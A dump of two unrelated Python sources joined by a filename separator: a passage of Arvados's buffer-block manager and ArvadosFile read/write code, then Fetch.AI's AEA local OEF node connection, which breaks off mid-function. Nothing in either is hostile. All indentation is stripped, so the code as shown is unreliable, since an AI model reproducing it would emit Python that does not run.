raise AssertionError("Cannot repack non-writable block")
segs = self.owner.segments()
# Collect the segments that reference the buffer block.
bufferblock_segs = [s for s in segs if s.locator == self.blockid]
# Collect total data referenced by segments (could be smaller than
# bufferblock size if a portion of the file was written and
# then overwritten).
write_total = sum([s.range_size for s in bufferblock_segs])
if write_total < self.size() or len(bufferblock_segs) > 1:
# If there's more than one segment referencing this block, it is
# due to out-of-order writes and will produce a fragmented
# manifest, so try to optimize by re-packing into a new buffer.
contents = self.buffer_view[0:self.write_pointer].tobytes()
new_bb = _BufferBlock(None, write_total, None)
for t in bufferblock_segs:
new_bb.append(contents[t.segment_offset:t.segment_offset+t.range_size])
t.segment_offset = new_bb.size() - t.range_size
self.buffer_block = new_bb.buffer_block
self.buffer_view = new_bb.buffer_view
self.write_pointer = new_bb.write_pointer
self._locator = None
new_bb.clear()
self.owner.set_segments(segs)
def __repr__(self):
return "<BufferBlock %s>" % (self.blockid)
class NoopLock(object):
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
pass
def acquire(self, blocking=False):
pass
def release(self):
pass
def must_be_writable(orig_func):
@functools.wraps(orig_func)
def must_be_writable_wrapper(self, *args, **kwargs):
if not self.writable():
raise IOError(errno.EROFS, "Collection is read-only.")
return orig_func(self, *args, **kwargs)
return must_be_writable_wrapper
class _BlockManager(object):
"""BlockManager handles buffer blocks.
Also handles background block uploads, and background block prefetch for a
Collection of ArvadosFiles.
"""
DEFAULT_PUT_THREADS = 2
DEFAULT_GET_THREADS = 2
def __init__(self, keep, copies=None, put_threads=None, num_retries=None):
"""keep: KeepClient object to use"""
self._keep = keep
self._bufferblocks = collections.OrderedDict()
self._put_queue = None
self._put_threads = None
self._prefetch_queue = None
self._prefetch_threads = None
self.lock = threading.Lock()
self.prefetch_enabled = True
if put_threads:
self.num_put_threads = put_threads
else:
self.num_put_threads = _BlockManager.DEFAULT_PUT_THREADS
self.num_get_threads = _BlockManager.DEFAULT_GET_THREADS
self.copies = copies
self._pending_write_size = 0
self.threads_lock = threading.Lock()
self.padding_block = None
self.num_retries = num_retries
@synchronized
def alloc_bufferblock(self, blockid=None, starting_capacity=2**14, owner=None):
"""Allocate a new, empty bufferblock in WRITABLE state and return it.
:blockid:
optional block identifier, otherwise one will be automatically assigned
:starting_capacity:
optional capacity, otherwise will use default capacity
:owner:
ArvadosFile that owns this block
"""
return self._alloc_bufferblock(blockid, starting_capacity, owner)
def _alloc_bufferblock(self, blockid=None, starting_capacity=2**14, owner=None):
if blockid is None:
blockid = str(uuid.uuid4())
bufferblock = _BufferBlock(blockid, starting_capacity=starting_capacity, owner=owner)
self._bufferblocks[bufferblock.blockid] = bufferblock
return bufferblock
@synchronized
def dup_block(self, block, owner):
"""Create a new bufferblock initialized with the content of an existing bufferblock.
:block:
the buffer block to copy.
:owner:
ArvadosFile that owns the new block
"""
new_blockid = str(uuid.uuid4())
bufferblock = block.clone(new_blockid, owner)
self._bufferblocks[bufferblock.blockid] = bufferblock
return bufferblock
@synchronized
def is_bufferblock(self, locator):
return locator in self._bufferblocks
def _commit_bufferblock_worker(self):
"""Background uploader thread."""
while True:
try:
bufferblock = self._put_queue.get()
if bufferblock is None:
return
if self.copies is None:
loc = self._keep.put(bufferblock.buffer_view[0:bufferblock.write_pointer].tobytes(), num_retries=self.num_retries)
else:
loc = self._keep.put(bufferblock.buffer_view[0:bufferblock.write_pointer].tobytes(), num_retries=self.num_retries, copies=self.copies)
bufferblock.set_state(_BufferBlock.COMMITTED, loc)
except Exception as e:
bufferblock.set_state(_BufferBlock.ERROR, e)
finally:
if self._put_queue is not None:
self._put_queue.task_done()
def start_put_threads(self):
with self.threads_lock:
if self._put_threads is None:
# Start uploader threads.
# If we don't limit the Queue size, the upload queue can quickly
# grow to take up gigabytes of RAM if the writing process is
# generating data more quickly than it can be send to the Keep
# servers.
#
# With two upload threads and a queue size of 2, this means up to 4
# blocks pending. If they are full 64 MiB blocks, that means up to
# 256 MiB of internal buffering, which is the same size as the
# default download block cache in KeepClient.
self._put_queue = queue.Queue(maxsize=2)
self._put_threads = []
for i in range(0, self.num_put_threads):
thread = threading.Thread(target=self._commit_bufferblock_worker)
self._put_threads.append(thread)
thread.daemon = True
thread.start()
def _block_prefetch_worker(self):
"""The background downloader thread."""
while True:
try:
b = self._prefetch_queue.get()
if b is None:
return
self._keep.get(b)
except Exception:
_logger.exception("Exception doing block prefetch")
@synchronized
def start_get_threads(self):
if self._prefetch_threads is None:
self._prefetch_queue = queue.Queue()
self._prefetch_threads = []
for i in range(0, self.num_get_threads):
thread = threading.Thread(target=self._block_prefetch_worker)
self._prefetch_threads.append(thread)
thread.daemon = True
thread.start()
@synchronized
def stop_threads(self):
"""Shut down and wait for background upload and download threads to finish."""
if self._put_threads is not None:
for t in self._put_threads:
self._put_queue.put(None)
for t in self._put_threads:
t.join()
self._put_threads = None
self._put_queue = None
if self._prefetch_threads is not None:
for t in self._prefetch_threads:
self._prefetch_queue.put(None)
for t in self._prefetch_threads:
t.join()
self._prefetch_threads = None
self._prefetch_queue = None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.stop_threads()
@synchronized
def repack_small_blocks(self, force=False, sync=False, closed_file_size=0):
"""Packs small blocks together before uploading"""
self._pending_write_size += closed_file_size
# Check if there are enough small blocks for filling up one in full
if not (force or (self._pending_write_size >= config.KEEP_BLOCK_SIZE)):
return
# Search blocks ready for getting packed together before being
# committed to Keep.
# A WRITABLE block always has an owner.
# A WRITABLE block with its owner.closed() implies that its
# size is <= KEEP_BLOCK_SIZE/2.
try:
small_blocks = [b for b in listvalues(self._bufferblocks)
if b.state() == _BufferBlock.WRITABLE and b.owner.closed()]
except AttributeError:
# Writable blocks without owner shouldn't exist.
raise UnownedBlockError()
if len(small_blocks) <= 1:
# Not enough small blocks for repacking
return
for bb in small_blocks:
bb.repack_writes()
# Update the pending write size count with its true value, just in case
# some small file was opened, written and closed several times.
self._pending_write_size = sum([b.size() for b in small_blocks])
if self._pending_write_size < config.KEEP_BLOCK_SIZE and not force:
return
new_bb = self._alloc_bufferblock()
new_bb.owner = []
files = []
while len(small_blocks) > 0 and (new_bb.write_pointer + small_blocks[0].size()) <= config.KEEP_BLOCK_SIZE:
bb = small_blocks.pop(0)
new_bb.owner.append(bb.owner)
self._pending_write_size -= bb.size()
new_bb.append(bb.buffer_view[0:bb.write_pointer].tobytes())
files.append((bb, new_bb.write_pointer - bb.size()))
self.commit_bufferblock(new_bb, sync=sync)
for bb, new_bb_segment_offset in files:
newsegs = bb.owner.segments()
for s in newsegs:
if s.locator == bb.blockid:
s.locator = new_bb.blockid
s.segment_offset = new_bb_segment_offset+s.segment_offset
bb.owner.set_segments(newsegs)
self._delete_bufferblock(bb.blockid)
def commit_bufferblock(self, block, sync):
"""Initiate a background upload of a bufferblock.
:block:
The block object to upload
:sync:
If `sync` is True, upload the block synchronously.
If `sync` is False, upload the block asynchronously. This will
return immediately unless the upload queue is at capacity, in
which case it will wait on an upload queue slot.
"""
try:
# Mark the block as PENDING so to disallow any more appends.
block.set_state(_BufferBlock.PENDING)
except StateChangeError as e:
if e.state == _BufferBlock.PENDING:
if sync:
block.wait_for_commit.wait()
else:
return
if block.state() == _BufferBlock.COMMITTED:
return
elif block.state() == _BufferBlock.ERROR:
raise block.error
else:
raise
if sync:
try:
if self.copies is None:
loc = self._keep.put(block.buffer_view[0:block.write_pointer].tobytes(), num_retries=self.num_retries)
else:
loc = self._keep.put(block.buffer_view[0:block.write_pointer].tobytes(), num_retries=self.num_retries, copies=self.copies)
block.set_state(_BufferBlock.COMMITTED, loc)
except Exception as e:
block.set_state(_BufferBlock.ERROR, e)
raise
else:
self.start_put_threads()
self._put_queue.put(block)
@synchronized
def get_bufferblock(self, locator):
return self._bufferblocks.get(locator)
@synchronized
def get_padding_block(self):
"""Get a bufferblock 64 MB in size consisting of all zeros, used as padding
when using truncate() to extend the size of a file.
For reference (and possible future optimization), the md5sum of the
padding block is: 7f614da9329cd3aebf59b91aadc30bf0+67108864
"""
if self.padding_block is None:
self.padding_block = self._alloc_bufferblock(starting_capacity=config.KEEP_BLOCK_SIZE)
self.padding_block.write_pointer = config.KEEP_BLOCK_SIZE
self.commit_bufferblock(self.padding_block, False)
return self.padding_block
@synchronized
def delete_bufferblock(self, locator):
self._delete_bufferblock(locator)
def _delete_bufferblock(self, locator):
bb = self._bufferblocks[locator]
bb.clear()
del self._bufferblocks[locator]
def get_block_contents(self, locator, num_retries, cache_only=False):
"""Fetch a block.
First checks to see if the locator is a BufferBlock and return that, if
not, passes the request through to KeepClient.get().
"""
with self.lock:
if locator in self._bufferblocks:
bufferblock = self._bufferblocks[locator]
if bufferblock.state() != _BufferBlock.COMMITTED:
return bufferblock.buffer_view[0:bufferblock.write_pointer].tobytes()
else:
locator = bufferblock._locator
if cache_only:
return self._keep.get_from_cache(locator)
else:
return self._keep.get(locator, num_retries=num_retries)
def commit_all(self):
"""Commit all outstanding buffer blocks.
This is a synchronous call, and will not return until all buffer blocks
are uploaded. Raises KeepWriteError() if any blocks failed to upload.
"""
self.repack_small_blocks(force=True, sync=True)
with self.lock:
items = listitems(self._bufferblocks)
for k,v in items:
if v.state() != _BufferBlock.COMMITTED and v.owner:
# Ignore blocks with a list of owners, as if they're not in COMMITTED
# state, they're already being committed asynchronously.
if isinstance(v.owner, ArvadosFile):
v.owner.flush(sync=False)
with self.lock:
if self._put_queue is not None:
self._put_queue.join()
err = []
for k,v in items:
if v.state() == _BufferBlock.ERROR:
err.append((v.locator(), v.error))
if err:
raise KeepWriteError("Error writing some blocks", err, label="block")
for k,v in items:
# flush again with sync=True to remove committed bufferblocks from
# the segments.
if v.owner:
if isinstance(v.owner, ArvadosFile):
v.owner.flush(sync=True)
elif isinstance(v.owner, list) and len(v.owner) > 0:
# This bufferblock is referenced by many files as a result
# of repacking small blocks, so don't delete it when flushing
# its owners, just do it after flushing them all.
for owner in v.owner:
owner.flush(sync=True)
self.delete_bufferblock(k)
def block_prefetch(self, locator):
"""Initiate a background download of a block.
This assumes that the underlying KeepClient implements a block cache,
so repeated requests for the same block will not result in repeated
downloads (unless the block is evicted from the cache.) This method
does not block.
"""
if not self.prefetch_enabled:
return
if self._keep.get_from_cache(locator) is not None:
return
with self.lock:
if locator in self._bufferblocks:
return
self.start_get_threads()
self._prefetch_queue.put(locator)
class ArvadosFile(object):
"""Represent a file in a Collection.
ArvadosFile manages the underlying representation of a file in Keep as a
sequence of segments spanning a set of blocks, and implements random
read/write access.
This object may be accessed from multiple threads.
"""
__slots__ = ('parent', 'name', '_writers', '_committed',
'_segments', 'lock', '_current_bblock', 'fuse_entry')
def __init__(self, parent, name, stream=[], segments=[]):
"""
ArvadosFile constructor.
:stream:
a list of Range objects representing a block stream
:segments:
a list of Range objects representing segments
"""
self.parent = parent
self.name = name
self._writers = set()
self._committed = False
self._segments = []
self.lock = parent.root_collection().lock
for s in segments:
self._add_segment(stream, s.locator, s.range_size)
self._current_bblock = None
def writable(self):
return self.parent.writable()
@synchronized
def permission_expired(self, as_of_dt=None):
"""Returns True if any of the segment's locators is expired"""
for r in self._segments:
if KeepLocator(r.locator).permission_expired(as_of_dt):
return True
return False
@synchronized
def has_remote_blocks(self):
"""Returns True if any of the segment's locators has a +R signature"""
for s in self._segments:
if '+R' in s.locator:
return True
return False
@synchronized
def _copy_remote_blocks(self, remote_blocks={}):
"""Ask Keep to copy remote blocks and point to their local copies.
This is called from the parent Collection.
:remote_blocks:
Shared cache of remote to local block mappings. This is used to avoid
doing extra work when blocks are shared by more than one file in
different subdirectories.
"""
for s in self._segments:
if '+R' in s.locator:
try:
loc = remote_blocks[s.locator]
except KeyError:
loc = self.parent._my_keep().refresh_signature(s.locator)
remote_blocks[s.locator] = loc
s.locator = loc
self.parent.set_committed(False)
return remote_blocks
@synchronized
def segments(self):
return copy.copy(self._segments)
@synchronized
def clone(self, new_parent, new_name):
"""Make a copy of this file."""
cp = ArvadosFile(new_parent, new_name)
cp.replace_contents(self)
return cp
@must_be_writable
@synchronized
def replace_contents(self, other):
"""Replace segments of this file with segments from another `ArvadosFile` object."""
map_loc = {}
self._segments = []
for other_segment in other.segments():
new_loc = other_segment.locator
if other.parent._my_block_manager().is_bufferblock(other_segment.locator):
if other_segment.locator not in map_loc:
bufferblock = other.parent._my_block_manager().get_bufferblock(other_segment.locator)
if bufferblock.state() != _BufferBlock.WRITABLE:
map_loc[other_segment.locator] = bufferblock.locator()
else:
map_loc[other_segment.locator] = self.parent._my_block_manager().dup_block(bufferblock, self).blockid
new_loc = map_loc[other_segment.locator]
self._segments.append(Range(new_loc, other_segment.range_start, other_segment.range_size, other_segment.segment_offset))
self.set_committed(False)
def __eq__(self, other):
if other is self:
return True
if not isinstance(other, ArvadosFile):
return False
othersegs = other.segments()
with self.lock:
if len(self._segments) != len(othersegs):
return False
for i in range(0, len(othersegs)):
seg1 = self._segments[i]
seg2 = othersegs[i]
loc1 = seg1.locator
loc2 = seg2.locator
if self.parent._my_block_manager().is_bufferblock(loc1):
loc1 = self.parent._my_block_manager().get_bufferblock(loc1).locator()
if other.parent._my_block_manager().is_bufferblock(loc2):
loc2 = other.parent._my_block_manager().get_bufferblock(loc2).locator()
if (KeepLocator(loc1).stripped() != KeepLocator(loc2).stripped() or
seg1.range_start != seg2.range_start or
seg1.range_size != seg2.range_size or
seg1.segment_offset != seg2.segment_offset):
return False
return True
def __ne__(self, other):
return not self.__eq__(other)
@synchronized
def set_segments(self, segs):
self._segments = segs
@synchronized
def set_committed(self, value=True):
"""Set committed flag.
If value is True, set committed to be True.
If value is False, set committed to be False for this and all parents.
"""
if value == self._committed:
return
self._committed = value
if self._committed is False and self.parent is not None:
self.parent.set_committed(False)
@synchronized
def committed(self):
"""Get whether this is committed or not."""
return self._committed
@synchronized
def add_writer(self, writer):
"""Add an ArvadosFileWriter reference to the list of writers"""
if isinstance(writer, ArvadosFileWriter):
self._writers.add(writer)
@synchronized
def remove_writer(self, writer, flush):
"""
Called from ArvadosFileWriter.close(). Remove a writer reference from the list
and do some block maintenance tasks.
"""
self._writers.remove(writer)
if flush or self.size() > config.KEEP_BLOCK_SIZE // 2:
# File writer closed, not small enough for repacking
self.flush()
elif self.closed():
# All writers closed and size is adequate for repacking
self.parent._my_block_manager().repack_small_blocks(closed_file_size=self.size())
def closed(self):
"""
Get whether this is closed or not. When the writers list is empty, the file
is supposed to be closed.
"""
return len(self._writers) == 0
@must_be_writable
@synchronized
def truncate(self, size):
"""Shrink or expand the size of the file.
If `size` is less than the size of the file, the file contents after
`size` will be discarded. If `size` is greater than the current size
of the file, it will be filled with zero bytes.
"""
if size < self.size():
new_segs = []
for r in self._segments:
range_end = r.range_start+r.range_size
if r.range_start >= size:
# segment is past the trucate size, all done
break
elif size < range_end:
nr = Range(r.locator, r.range_start, size - r.range_start, 0)
nr.segment_offset = r.segment_offset
new_segs.append(nr)
break
else:
new_segs.append(r)
self._segments = new_segs
self.set_committed(False)
elif size > self.size():
padding = self.parent._my_block_manager().get_padding_block()
diff = size - self.size()
while diff > config.KEEP_BLOCK_SIZE:
self._segments.append(Range(padding.blockid, self.size(), config.KEEP_BLOCK_SIZE, 0))
diff -= config.KEEP_BLOCK_SIZE
if diff > 0:
self._segments.append(Range(padding.blockid, self.size(), diff, 0))
self.set_committed(False)
else:
# size == self.size()
pass
def readfrom(self, offset, size, num_retries, exact=False):
"""Read up to `size` bytes from the file starting at `offset`.
:exact:
If False (default), return less data than requested if the read
crosses a block boundary and the next block isn't cached. If True,
only return less data than requested when hitting EOF.
"""
with self.lock:
if size == 0 or offset >= self.size():
return b''
readsegs = locators_and_ranges(self._segments, offset, size)
prefetch = locators_and_ranges(self._segments, offset + size, config.KEEP_BLOCK_SIZE, limit=32)
locs = set()
data = []
for lr in readsegs:
block = self.parent._my_block_manager().get_block_contents(lr.locator, num_retries=num_retries, cache_only=(bool(data) and not exact))
if block:
blockview = memoryview(block)
data.append(blockview[lr.segment_offset:lr.segment_offset+lr.segment_size].tobytes())
locs.add(lr.locator)
else:
break
for lr in prefetch:
if lr.locator not in locs:
self.parent._my_block_manager().block_prefetch(lr.locator)
locs.add(lr.locator)
return b''.join(data)
@must_be_writable
@synchronized
def writeto(self, offset, data, num_retries):
"""Write `data` to the file starting at `offset`.
This will update existing bytes and/or extend the size of the file as
necessary.
"""
if not isinstance(data, bytes) and not isinstance(data, memoryview):
data = data.encode()
if len(data) == 0:
return
if offset > self.size():
self.truncate(offset)
if len(data) > config.KEEP_BLOCK_SIZE:
# Chunk it up into smaller writes
n = 0
dataview = memoryview(data)
while n < len(data):
self.writeto(offset+n, dataview[n:n + config.KEEP_BLOCK_SIZE].tobytes(), num_retries)
n += config.KEEP_BLOCK_SIZE
return
self.set_committed(False)
if self._current_bblock is None or self._current_bblock.state() != _BufferBlock.WRITABLE:
self._current_bblock = self.parent._my_block_manager().alloc_bufferblock(owner=self)
if (self._current_bblock.size() + len(data)) > config.KEEP_BLOCK_SIZE:
self._current_bblock.repack_writes()
if (self._current_bblock.size() + len(data)) > config.KEEP_BLOCK_SIZE:
self.parent._my_block_manager().commit_bufferblock(self._current_bblock, sync=False)
self._current_bblock = self.parent._my_block_manager().alloc_bufferblock(owner=self)
self._current_bblock.append(data)
replace_range(self._segments, offset, len(data), self._current_bblock.blockid, self._current_bblock.write_pointer - len(data))
self.parent.notify(WRITE, self.parent, self.name, (self, self))
return len(data)
@synchronized
def flush(self, sync=True, num_retries=0):
"""Flush the current bufferblock to Keep.
:sync:
If True, commit block synchronously, wait until buffer block has been written.
If False, commit block asynchronously, return immediately after putting block into
the keep put queue.
"""
if self.committed():
return
if self._current_bblock and self._current_bblock.state() != _BufferBlock.COMMITTED:
if self._current_bblock.state() == _BufferBlock.WRITABLE:
self._current_bblock.repack_writes()
if self._current_bblock.state() != _BufferBlock.DELETED:
self.parent._my_block_manager().commit_bufferblock(self._current_bblock, sync=sync)
if sync:
to_delete = set()
for s in self._segments:
bb = self.parent._my_block_manager().get_bufferblock(s.locator)
if bb:
if bb.state() != _BufferBlock.COMMITTED:
self.parent._my_block_manager().commit_bufferblock(bb, sync=True)
to_delete.add(s.locator)
s.locator = bb.locator()
for s in to_delete:
# Don't delete the bufferblock if it's owned by many files. It'll be
# deleted after all of its owners are flush()ed.
if self.parent._my_block_manager().get_bufferblock(s).owner is self:
self.parent._my_block_manager().delete_bufferblock(s)
self.parent.notify(MOD, self.parent, self.name, (self, self))
@must_be_writable
@synchronized
def add_segment(self, blocks, pos, size):
"""Add a segment to the end of the file.
`pos` and `offset` reference a section of the stream described by
`blocks` (a list of Range objects)
"""
self._add_segment(blocks, pos, size)
def _add_segment(self, blocks, pos, size):
"""Internal implementation of add_segment."""
self.set_committed(False)
for lr in locators_and_ranges(blocks, pos, size):
last = self._segments[-1] if self._segments else Range(0, 0, 0, 0)
r = Range(lr.locator, last.range_start+last.range_size, lr.segment_size, lr.segment_offset)
self._segments.append(r)
@synchronized
def size(self):
"""Get the file size."""
if self._segments:
n = self._segments[-1]
return n.range_start + n.range_size
else:
return 0
@synchronized
def manifest_text(self, stream_name=".", portable_locators=False,
normalize=False, only_committed=False):
buf = ""
filestream = []
for segment in self._segments:
loc = segment.locator
if self.parent._my_block_manager().is_bufferblock(loc):
if only_committed:
continue
loc = self.parent._my_block_manager().get_bufferblock(loc).locator()
if portable_locators:
loc = KeepLocator(loc).stripped()
filestream.append(LocatorAndRange(loc, KeepLocator(loc).size,
segment.segment_offset, segment.range_size))
buf += ' '.join(normalize_stream(stream_name, {self.name: filestream}))
buf += "\n"
return buf
@must_be_writable
@synchronized
def _reparent(self, newparent, newname):
self.set_committed(False)
self.flush(sync=True)
self.parent.remove(self.name)
self.parent = newparent
self.name = newname
self.lock = self.parent.root_collection().lock
class ArvadosFileReader(ArvadosFileReaderBase):
"""Wraps ArvadosFile in a file-like object supporting reading only.
Be aware that this class is NOT thread safe as there is no locking around
updating file pointer.
"""
def __init__(self, arvadosfile, mode="r", num_retries=None):
super(ArvadosFileReader, self).__init__(arvadosfile.name, mode=mode, num_retries=num_retries)
self.arvadosfile = arvadosfile
def size(self):
return self.arvadosfile.size()
def stream_name(self):
return self.arvadosfile.parent.stream_name()
def readinto(self, b):
data = self.read(len(b))
b[:len(data)] = data
return len(data)
@_FileLikeObjectBase._before_close
@retry_method
def read(self, size=None, num_retries=None):
"""Read up to `size` bytes from the file and return the result.
Starts at the current file position. If `size` is None, read the
entire remainder of the file.
"""
if size is None:
data = []
rd = self.arvadosfile.readfrom(self._filepos, config.KEEP_BLOCK_SIZE, num_retries)
while rd:
data.append(rd)
self._filepos += len(rd)
rd = self.arvadosfile.readfrom(self._filepos, config.KEEP_BLOCK_SIZE, num_retries)
return b''.join(data)
else:
data = self.arvadosfile.readfrom(self._filepos, size, num_retries, exact=True)
self._filepos += len(data)
return data
@_FileLikeObjectBase._before_close
@retry_method
def readfrom(self, offset, size, num_retries=None):
"""Read up to `size` bytes from the stream, starting at the specified file offset.
This method does not change the file position.
"""
return self.arvadosfile.readfrom(offset, size, num_retries)
def flush(self):
pass
class ArvadosFileWriter(ArvadosFileReader):
"""Wraps ArvadosFile in a file-like object supporting both reading and writing.
Be aware that this class is NOT thread safe as there is no locking around
updating file pointer.
"""
def __init__(self, arvadosfile, mode, num_retries=None):
super(ArvadosFileWriter, self).__init__(arvadosfile, mode=mode, num_retries=num_retries)
self.arvadosfile.add_writer(self)
def writable(self):
return True
@_FileLikeObjectBase._before_close
@retry_method
def write(self, data, num_retries=None):
if self.mode[0] == "a":
self._filepos = self.size()
self.arvadosfile.writeto(self._filepos, data, num_retries)
self._filepos += len(data)
return len(data)
@_FileLikeObjectBase._before_close
@retry_method
def writelines(self, seq, num_retries=None):
for s in seq:
self.write(s, num_retries=num_retries)
@_FileLikeObjectBase._before_close
def truncate(self, size=None):
if size is None:
size = self._filepos
self.arvadosfile.truncate(size)
@_FileLikeObjectBase._before_close
def flush(self):
self.arvadosfile.flush()
def close(self, flush=True):
if not self.closed:
self.arvadosfile.remove_writer(self, flush)
super(ArvadosFileWriter, self).close()
class WrappableFile(object):
"""An interface to an Arvados file that's compatible with io wrappers.
"""
def __init__(self, f):
self.f = f
self.closed = False
def close(self):
self.closed = True
return self.f.close()
def flush(self):
return self.f.flush()
def read(self, *args, **kwargs):
return self.f.read(*args, **kwargs)
def readable(self):
return self.f.readable()
def readinto(self, *args, **kwargs):
return self.f.readinto(*args, **kwargs)
def seek(self, *args, **kwargs):
return self.f.seek(*args, **kwargs)
def seekable(self):
return self.f.seekable()
def tell(self):
return self.f.tell()
def writable(self):
return self.f.writable()
def write(self, *args, **kwargs):
return self.f.write(*args, **kwargs)
|
connection.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""Extension to the Local Node."""
import asyncio
import logging
import threading
from asyncio import AbstractEventLoop, Queue
from collections import defaultdict
from concurrent.futures import Future
from threading import Thread
from typing import Any, Dict, List, Optional, Tuple, cast
from aea.common import Address
from aea.configurations.base import PublicId
from aea.connections.base import Connection, ConnectionStates
from aea.helpers.search.models import Description
from aea.mail.base import Envelope
from aea.protocols.base import Message
from aea.protocols.dialogue.base import Dialogue as BaseDialogue
from packages.fetchai.protocols.default.message import DefaultMessage
from packages.fetchai.protocols.oef_search.dialogues import (
OefSearchDialogue as BaseOefSearchDialogue,
)
from packages.fetchai.protocols.oef_search.dialogues import (
OefSearchDialogues as BaseOefSearchDialogues,
)
from packages.fetchai.protocols.oef_search.message import OefSearchMessage
_default_logger = logging.getLogger("aea.packages.fetchai.connections.local")
TARGET = 0
MESSAGE_ID = 1
RESPONSE_TARGET = MESSAGE_ID
RESPONSE_MESSAGE_ID = MESSAGE_ID + 1
STUB_DIALOGUE_ID = 0
PUBLIC_ID = PublicId.from_str("fetchai/local:0.19.0")
OefSearchDialogue = BaseOefSearchDialogue
OEF_LOCAL_NODE_SEARCH_ADDRESS = "oef_local_node_search"
OEF_LOCAL_NODE_ADDRESS = "oef_local_node"
class OefSearchDialogues(BaseOefSearchDialogues):
"""The dialogues class keeps track of all dialogues."""
def __init__(self) -> None:
"""
Initialize dialogues.
:return: None
"""
def role_from_first_message( # pylint: disable=unused-argument
message: Message, receiver_address: Address
) -> BaseDialogue.Role:
"""Infer the role of the agent from an incoming/outgoing first message
:param message: an incoming/outgoing first message
:param receiver_address: the address of the receiving agent
:return: The role of the agent
"""
# The local connection maintains the dialogue on behalf of the node
return OefSearchDialogue.Role.OEF_NODE
BaseOefSearchDialogues.__init__(
self,
self_address=OEF_LOCAL_NODE_SEARCH_ADDRESS,
role_from_first_message=role_from_first_message,
dialogue_class=OefSearchDialogue,
)
class LocalNode:
"""A light-weight local implementation of a OEF Node."""
def __init__(
self, loop: AbstractEventLoop = None, logger: logging.Logger = _default_logger
):
"""
Initialize a local (i.e. non-networked) implementation of an OEF Node.
:param loop: the event loop. If None, a new event loop is instantiated.
"""
self._lock = threading.Lock()
self.services = defaultdict(lambda: []) # type: Dict[str, List[Description]]
self._loop = loop if loop is not None else asyncio.new_event_loop()
self._thread = Thread(target=self._run_loop, daemon=True)
self._in_queue = asyncio.Queue(loop=self._loop) # type: asyncio.Queue
self._out_queues = {} # type: Dict[str, asyncio.Queue]
self._receiving_loop_task = None # type: Optional[Future]
self.address: Optional[Address] = None
self._dialogues: Optional[OefSearchDialogues] = None
self.logger = logger
def __enter__(self) -> "LocalNode":
"""Start the local node."""
self.start()
return self
def __exit__(self, exc_type: str, exc_val: str, exc_tb: str) -> None:
"""Stop the local node."""
self.stop()
def _run_loop(self) -> None:
"""
Run the asyncio loop.
This method is supposed to be run only in the Multiplexer thread.
"""
self.logger.debug("Starting threaded asyncio loop...")
asyncio.set_event_loop(self._loop)
self._loop.run_forever()
self.logger.debug("Asyncio loop has been stopped.")
async def connect(
self, address: Address, writer: asyncio.Queue
) -> Optional[asyncio.Queue]:
"""
Connect an address to the node.
:param address: the address of the agent.
:param writer: the queue where the client is listening.
:return: an asynchronous queue, that constitutes the communication channel.
"""
if address in self._out_queues.keys():
return None
if self._in_queue is None: # pragma: nocover
raise ValueError("In queue not set.")
q = self._in_queue # type: asyncio.Queue
self._out_queues[address] = writer
self.address = address
self._dialogues = OefSearchDialogues()
return q
def start(self) -> None:
"""Start the node."""
if not self._loop.is_running() and not self._thread.is_alive():
self._thread.start()
self._receiving_loop_task = asyncio.run_coroutine_threadsafe(
self.receiving_loop(), loop=self._loop
)
self.logger.debug("Local node has been started.")
def stop(self) -> None:
"""Stop the node."""
if self._receiving_loop_task is None:
raise ValueError("Connection not started!")
asyncio.run_coroutine_threadsafe(self._in_queue.put(None), self._loop).result()
self._receiving_loop_task.result()
if self._loop.is_running():
self._loop.call_soon_threadsafe(self._loop.stop)
if self._thread.is_alive():
self._thread.join()
async def receiving_loop(self) -> None:
"""Process incoming messages."""
while True:
envelope = await self._in_queue.get()
if envelope is None:
self.logger.debug("Receiving loop terminated.")
return
self.logger.debug("Handling envelope: {}".format(envelope))
await self._handle_envelope(envelope)
async def _handle_envelope(self, envelope: Envelope) -> None:
"""Handle an envelope.
:param envelope: the envelope
:return: None
"""
if (
envelope.protocol_specification_id
== OefSearchMessage.protocol_specification_id
):
await self._handle_oef_message(envelope)
else:
OEFLocalConnection._ensure_valid_envelope_for_external_comms( # pylint: disable=protected-access
envelope
)
await self._handle_agent_message(envelope)
async def _handle_oef_message(self, envelope: Envelope) -> None:
"""Handle oef messages.
:param envelope: the envelope
:return: None
"""
if not isinstance(envelope.message, OefSearchMessage): # pragma: nocover
raise ValueError("Message not of type OefSearchMessage.")
oef_message, dialogue = self._get_message_and_dialogue(envelope)
if dialogue is None:
self.logger.warning(
"Could not create dialogue for message={}".format(oef_message)
)
return
if oef_message.performative == OefSearchMessage.Performative.REGISTER_SERVICE:
await self._register_service(
envelope.sender, oef_message.service_description
)
elif (
oef_message.performative == OefSearchMessage.Performative.UNREGISTER_SERVICE
):
await self._unregister_service(oef_message, dialogue)
elif oef_message.performative == OefSearchMessage.Performative.SEARCH_SERVICES:
await self._search_services(oef_message, dialogue)
else:
# request not recognized
pass
async def _handle_agent_message(self, envelope: Envelope) -> None:
"""
Forward an envelope to the right agent.
:param envelope: the envelope
:return: None
"""
destination = envelope.to
if destination not in self._out_queues.keys():
msg = DefaultMessage(
performative=DefaultMessage.Performative.ERROR,
dialogue_reference=("", ""),
target=TARGET,
message_id=MESSAGE_ID,
error_code=DefaultMessage.ErrorCode.INVALID_DIALOGUE,
error_msg="Destination not available",
error_data={},
)
error_envelope = Envelope(
to=envelope.sender, sender=OEF_LOCAL_NODE_ADDRESS, message=msg,
)
await self._send(error_envelope)
return
await self._send(envelope)
async def _register_service(
self, address: Address, service_description: Description
) -> None:
"""
Register a service agent in the service directory of the node.
:param address: the address of the service agent to be registered.
:param service_description: the description of the service agent to be registered.
:return: None
"""
with self._lock:
self.services[address].append(service_description)
async def _unregister_service(
self, oef_search_msg: OefSearchMessage, dialogue: OefSearchDialogue,
) -> None:
"""
Unregister a service agent.
:param oef_search_msg: the incoming message.
:param dialogue: the dialogue.
:return: None
"""
service_description = oef_search_msg.service_description
address = oef_search_msg.sender
with self._lock:
if address not in self.services:
msg = dialogue.reply(
